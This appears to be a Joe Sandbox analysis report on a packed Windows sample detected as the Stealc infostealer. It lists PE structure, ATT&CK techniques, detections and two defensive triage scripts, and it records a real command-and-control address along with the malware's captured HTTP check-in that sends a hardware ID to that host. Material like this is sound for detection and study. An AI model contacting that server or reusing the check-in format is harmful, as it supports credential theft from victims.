Source: Yara match | File source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Create Account (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (13) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpft | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpv9 | 100% | Avira URL Cloud | malware
http://185.215.113.206/d9 | 100% | Avira URL Cloud | malware
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/d9 | file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpft | file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/ws | file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/H | file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpR | file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php& | file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpF | file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpv9 | file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1562132
                              Start date and time:2024-11-25 08:43:10 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 22s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 121
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC Stealer | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC Stealer | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC Stealer | 185.215.113.16
 | file.exe | malicious | LummaC Stealer | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
No context
                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.944066096598265
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'823'232 bytes
MD5: 195eafa20236c52b744d7ff88ccf8dd6
SHA1: eb079dc207806442f57ef816f42f8b0a1835aa46
SHA256: 110760d0807d24cda6139d69aee2e1166753ad3ee33e4f9751f3c036903838b4
SHA512: ed80f68b578faa2283bdd99e694e48eede8a98dbf94803e41134d0f9598eef032ae655be4582e492667daee2a4b46f5cec0c8083e653edd5eef828eadc1616a8
SSDEEP: 49152:RARoaEikztxPzNJ8df19mgqtjsNuZJKCRFO:RAJNqxPpJ8df/Kg6KCR0
TLSH: 578533CBA6F403DDC8DD64B68BDD86813FAAFD60C71D82B68A90323D94C27861DBD445
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaa3000 (RVA 0x6a3000 relative to the preferred image base, i.e. the first byte of .taggant)
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entrypoint, 0xaa3000 in .taggant: after the initial jmp the bytes that follow are mostly 0x00 and decode as "add byte ptr [eax], al" rather than meaningful code)
                              jmp 00007F67790A2A5Ah
                              cmpxchg byte ptr [ebx], bl
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add cl, ch
                              add byte ptr [eax], ah
                              add byte ptr [eax], al
                              add byte ptr [ebx], cl
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+00h], ah
                              add byte ptr [eax], al
                              pop dword ptr fs:[eax+0000000Fh]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ebx], cl
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [esi], al
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x24b04d         0x61          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x24a000         0x2b0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x24b1f8         0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type             Entropy              Characteristics (IMAGE_SCN_ prefix omitted)
(unnamed)  0x1000           0x249000      0x16200   7592cd79d6255c408cc15c7d2fab6045  unknown   unknown               unknown               unknown              CNT_INITIALIZED_DATA, MEM_EXECUTE, MEM_READ, MEM_WRITE
.rsrc      0x24a000         0x2b0         0x200     bdbac752e1cbf59dcc07a57ad5d38c57  False     0.798828125           data                  6.0509464530589785   CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE
.idata     0x24b000         0x1000        0x200     0d0399d83a742d5d86c5718841e8e842  False     0.134765625           data                  0.8646718654202081   CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE
(unnamed)  0x24c000         0x2b2000      0x200     c40955d2b2b4135cdfce9877aad06867  unknown   unknown               unknown               unknown              CNT_INITIALIZED_DATA, MEM_EXECUTE, MEM_READ, MEM_WRITE
olrcobvx   0x4fe000         0x1a4000      0x1a3400  08011c52ebefe937f00bd5310eb27ef8  False     0.9947689559108527    data                  7.953678479680492    CNT_INITIALIZED_DATA, MEM_EXECUTE, MEM_READ, MEM_WRITE
fyiwyewh   0x6a2000         0x1000        0x400     68327c4823ca73fbde4e2fdeabb40999  False     0.7529296875          data                  5.991552767790281    CNT_INITIALIZED_DATA, MEM_EXECUTE, MEM_READ, MEM_WRITE
.taggant   0x6a3000         0x3000        0x2200    241f32430ccf65d51784ec58d3928017  False     0.042738970588235295  DOS executable (COM)  0.5543163031120827   CNT_INITIALIZED_DATA, MEM_EXECUTE, MEM_READ, MEM_WRITE
Name         RVA       Size   Type                                    Language  Country  ZLIB Complexity
RT_MANIFEST  0x6a1188  0x256  ASCII text, with CRLF line terminators                     0.5100334448160535
DLL           Import
kernel32.dll  lstrcpy
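The section table and import list above carry the static indicators of a packed loader: no section is marked CNT_CODE, every executable section is also writable, two sections have no name and two have random names, the first section reserves 0x249000 bytes of virtual space for 0x16200 bytes on disk, olrcobvx is at entropy 7.95, and the only import is kernel32!lstrcpy. The script below, an added example rather than Joe Sandbox's own code, turns those observations into reusable checks: a Shannon-entropy routine for raw section bytes plus a small set of section-table heuristics run over the values printed in this report. The IMAGE_SCN_* values are the PE/COFF flag constants; the thresholds (more than 64 KiB of uninitialised slack, entropy above 7.5) are this example's own choice.

```python
"""Static-triage heuristics applied to the section table above.

Added example, not Joe Sandbox's code.  The section values are copied from the
report; the IMAGE_SCN_* constants are the PE/COFF flag values; the thresholds
(64 KiB of uninitialised slack, entropy above 7.5) are this example's own choice.
"""
import math
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a linker normally emits; anything else, or no name at all, is worth a look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".bss", ".tls", ".CRT"}


@dataclass
class Section:
    name: str
    rva: int
    vsize: int
    raw_size: int
    entropy: Optional[float]   # None where the report prints "unknown"
    flags: int


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_sections(sections: List[Section], entry_point_va: int,
                    image_base: int) -> List[Tuple[str, str]]:
    """Return (kind, message) findings; kind is a short tag for filtering."""
    findings = []
    entry_rva = entry_point_va - image_base
    for s in sections:
        label = s.name or "<unnamed>"
        if s.rva <= entry_rva < s.rva + s.vsize and not s.flags & IMAGE_SCN_CNT_CODE:
            findings.append(("entry", f"entry point RVA 0x{entry_rva:x} is in {label}, "
                                      "which is not marked CNT_CODE"))
        if s.flags & IMAGE_SCN_MEM_WRITE and s.flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append(("wx", f"{label} is writable and executable"))
        if not s.name:
            findings.append(("unnamed", f"unnamed section at RVA 0x{s.rva:x}"))
        elif s.name not in STANDARD_NAMES:
            findings.append(("name", f"non-standard section name {label}"))
        slack = s.vsize - s.raw_size
        if slack > 0x10000:
            findings.append(("slack", f"{label} maps 0x{slack:x} bytes more than it "
                                      "stores on disk (room for code unpacked at runtime)"))
        if s.entropy is not None and s.entropy > 7.5:
            findings.append(("entropy", f"{label} has entropy {s.entropy:.2f} "
                                        "(compressed or encrypted content)"))
    return findings


RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Section table of file.exe as printed in the report (entropy rounded to 2 places).
REPORTED_SECTIONS = [
    Section("",         0x1000,   0x249000, 0x16200,  None, RWX),
    Section(".rsrc",    0x24a000, 0x2b0,    0x200,    6.05, RW),
    Section(".idata",   0x24b000, 0x1000,   0x200,    0.86, RW),
    Section("",         0x24c000, 0x2b2000, 0x200,    None, RWX),
    Section("olrcobvx", 0x4fe000, 0x1a4000, 0x1a3400, 7.95, RWX),
    Section("fyiwyewh", 0x6a2000, 0x1000,   0x400,    5.99, RWX),
    Section(".taggant", 0x6a3000, 0x3000,   0x2200,   0.55, RWX),
]
IMAGE_BASE = 0x400000      # preferred base from the optional header
ENTRY_POINT_VA = 0xaa3000  # "Entrypoint" as printed in the report


def triage_file_exe() -> List[Tuple[str, str]]:
    return triage_sections(REPORTED_SECTIONS, ENTRY_POINT_VA, IMAGE_BASE)


if __name__ == "__main__":
    for kind, msg in triage_file_exe():
        print(f"[{kind:8}] {msg}")
```

On this sample the run yields one entry-point finding (.taggant), five writable-and-executable sections, two unnamed sections, three non-standard names, two sections with large uninitialised slack (the two unnamed ones) and one high-entropy section (olrcobvx). The first unnamed section is the one that matters at runtime: the Yara hit on the process dump at 0xE41000 is the runtime image base 0xe40000 plus RVA 0x1000, i.e. the unpacked code lands in exactly the slack that section reserves. Feed shannon_entropy() the raw bytes of a section read from disk when you have the file rather than the report.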
Timestamp: 2024-11-25T08:44:20.873510+0100
SID: 2044243
Signature: ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in
Severity: 1
Source: 192.168.2.7:49710
Destination: 185.215.113.206:80
Protocol: TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 25, 2024 08:44:18.846431971 CET  49710        80         192.168.2.7      185.215.113.206
Nov 25, 2024 08:44:18.965966940 CET  80           49710      185.215.113.206  192.168.2.7
Nov 25, 2024 08:44:18.966171026 CET  49710        80         192.168.2.7      185.215.113.206
Nov 25, 2024 08:44:18.967195034 CET  49710        80         192.168.2.7      185.215.113.206
Nov 25, 2024 08:44:19.086585999 CET  80           49710      185.215.113.206  192.168.2.7
Nov 25, 2024 08:44:20.405632973 CET  80           49710      185.215.113.206  192.168.2.7
Nov 25, 2024 08:44:20.405812979 CET  49710        80         192.168.2.7      185.215.113.206
Nov 25, 2024 08:44:20.408330917 CET  49710        80         192.168.2.7      185.215.113.206
Nov 25, 2024 08:44:20.527800083 CET  80           49710      185.215.113.206  192.168.2.7
Nov 25, 2024 08:44:20.873409033 CET  80           49710      185.215.113.206  192.168.2.7
Nov 25, 2024 08:44:20.873509884 CET  49710        80         192.168.2.7      185.215.113.206
Nov 25, 2024 08:44:23.423357010 CET  49710        80         192.168.2.7      185.215.113.206
HTTP sessions (185.215.113.206)
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.7  49710        185.215.113.206  80                7468  C:\Users\user\Desktop\file.exe
Timestamp / Bytes transferred / Direction / Data

Nov 25, 2024 08:44:18.967195034 CET  90 bytes  OUT
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Nov 25, 2024 08:44:20.405632973 CET  203 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 07:44:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Nov 25, 2024 08:44:20.408330917 CET  413 bytes  OUT
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBG
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 35 33 45 39 37 38 46 41 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes; 211 bytes, matching Content-Length):
------IJECAEHJJJKJKFIDGCBG
Content-Disposition: form-data; name="hwid"

2553E978FAD72284582127
------IJECAEHJJJKJKFIDGCBG
Content-Disposition: form-data; name="build"

mars
------IJECAEHJJJKJKFIDGCBG--

Nov 25, 2024 08:44:20.873409033 CET  210 bytes  IN
HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 07:44:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64; decodes to "block")
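The exchange above is the whole of the sample's network activity: an empty GET, then a two-field multipart POST (hwid and build name "mars") to /c4becf79229cb002.php, answered with the eight bytes YmxvY2s=, which is base64 for "block"; no further request follows before the process exits. The script below, an added example that is not Joe Sandbox's code, parses that check-in the way a triage tool would and decodes the reply. CHECKIN_BODY is the 211-byte POST body reconstructed from the report's raw hex with its CRLF line endings restored, C2_REPLY is the response body the report prints, and the shape test in looks_like_stealc_checkin() is derived from this one capture only, not from the ET signature.

```python
"""Parse the Stealc check-in POST shown above and decode the server's reply.

Added example, not Joe Sandbox's code.  CHECKIN_BODY is the 211-byte body
reconstructed from the report's raw hex with its CRLF line endings restored;
C2_REPLY is the 8-byte response body the report prints.  The shape check in
looks_like_stealc_checkin() is derived from this single capture only.
"""
import base64
import re
from typing import Dict

BOUNDARY = b"----IJECAEHJJJKJKFIDGCBG"   # from the POST's Content-Type header

CHECKIN_BODY = (
    b"------IJECAEHJJJKJKFIDGCBG\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"2553E978FAD72284582127\r\n"
    b"------IJECAEHJJJKJKFIDGCBG\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"mars\r\n"
    b"------IJECAEHJJJKJKFIDGCBG--\r\n"
)

C2_REPLY = b"YmxvY2s="


def parse_multipart_form(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser (RFC 2046 framing, no nested parts).

    Each part is split at its first blank line; the field name comes from the
    Content-Disposition header, and the CRLF that precedes the next delimiter
    (which belongs to the delimiter, not the value) is removed from the value.
    """
    fields = {}
    delimiter = b"--" + boundary
    for part in body.split(delimiter)[1:]:     # [0] is the preamble, empty here
        if part.startswith(b"--"):             # closing delimiter "--boundary--"
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        headers, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', headers)
        if match:
            if value.endswith(b"\r\n"):
                value = value[:-2]
            fields[match.group(1).decode("ascii")] = value
    return fields


def decode_reply(raw: bytes) -> str:
    """The reply body is plain base64 with no framing around it."""
    return base64.b64decode(raw, validate=True).decode("ascii")


def looks_like_stealc_checkin(fields: Dict[str, bytes]) -> bool:
    """Exactly two fields, hwid and build, with hwid an upper-case hex string."""
    return (set(fields) == {"hwid", "build"}
            and re.fullmatch(rb"[0-9A-F]+", fields["hwid"]) is not None)


def classify_checkin(body: bytes, boundary: bytes, reply: bytes) -> Dict[str, object]:
    fields = parse_multipart_form(body, boundary)
    verdict = decode_reply(reply)
    return {
        "hwid": fields.get("hwid", b"").decode("ascii"),
        "build": fields.get("build", b"").decode("ascii"),
        "checkin_shape": looks_like_stealc_checkin(fields),
        "reply": verdict,
        "blocked": verdict == "block",
    }


if __name__ == "__main__":
    assert len(CHECKIN_BODY) == 211, "must match the POST's Content-Length header"
    print(classify_checkin(CHECKIN_BODY, BOUNDARY, C2_REPLY))
```

Two details worth keeping when you adapt this to a PCAP: check the reconstructed body length against Content-Length before trusting any field (the assert above does that), and treat the base64 reply as data to decode, never as something to display raw, since the same channel would carry the panel's configuration on a check-in it accepts. In this capture the decoded reply is "block" and the client sends nothing further, which is consistent with the panel declining to serve this host.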



Target ID: 1
Start time: 02:44:14
Start date: 25/11/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xe40000 (relocated from the preferred base 0x400000; DYNAMIC_BASE is set)
File size: 1'823'232 bytes
MD5 hash: 195EAFA20236C52B744D7FF88CCF8DD6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                                Execution Graph

                                Execution Coverage:4.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.4%
                                Total number of Nodes:1409
                                Total number of Limit Nodes:28
execution_graph (the report renders this as an interactive graph; the node dump is summarised here by the call chains it records, with addresses relative to the runtime image base 0xe40000; the dump is truncated at the end of the section)

Root nodes without a recorded caller:
• e62d60 (11 API calls)
• e62b60: GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA
• e51269 (408 API calls)
• e45869 (57 API calls)
• e54c77 (295 API calls)

Main chain from e61bf0:
• e42a90 calls e44a60 (RtlAllocateHeap, then VirtualProtect) dozens of times in a row, after which e66390 reads the PEB (GetPEB), calls LoadLibraryA five times at e665c3 and resolves further functions with GetProcAddress (e66625, e66641, e66675, e66691, e666ad); e663d7 contributes another 20 API calls.
